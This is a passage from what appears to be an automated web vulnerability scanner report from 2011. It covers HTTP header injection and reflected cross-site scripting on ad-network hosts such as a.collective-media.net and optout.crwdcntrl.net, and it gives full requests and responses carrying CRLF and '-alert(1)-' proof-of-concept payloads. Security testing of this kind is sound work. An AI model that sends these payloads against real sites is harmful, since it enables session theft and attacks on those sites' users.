Request

GET /optout?d=71d66%0d%0a93e8c521907 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:24 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:31 GMT
Location: http://optout.crwdcntrl.net/optout?d=71d66
93e8c521907
&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload aca9c%0d%0aae1dd9efdab was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c%0d%0aae1dd9efdab=1 HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:40 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&aca9c
ae1dd9efdab
=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4. Cross-site scripting (reflected)  previous  next
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa62'-alert(1)-'8c692c22431 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:36 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:36 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0581'-alert(1)-'e88ada4a155 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:37 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:37 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ae5'-alert(1)-'40561ccbb3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 466
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:34 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f443e'-alert(1)-'c92a6f31e27 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 463
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:20 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9830'-alert(1)-'06f66f21338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1f33'-alert(1)-'01a9ecf3769 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a9e3'-alert(1)-'d66700f8150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:01 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e932'-alert(1)-'30f90c72958 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?1e932'-alert(1)-'30f90c72958 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:47:59 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da516cc31cbb50b4a; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:47:59 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?1e932'-alert(1)-'30f90c72958;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35275'-alert(1)-'d0849d7af27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:29 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:29 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cec5'-alert(1)-'2bc5f5d3ce8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:30 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:30 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f507c'-alert(1)-'0cce3655674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
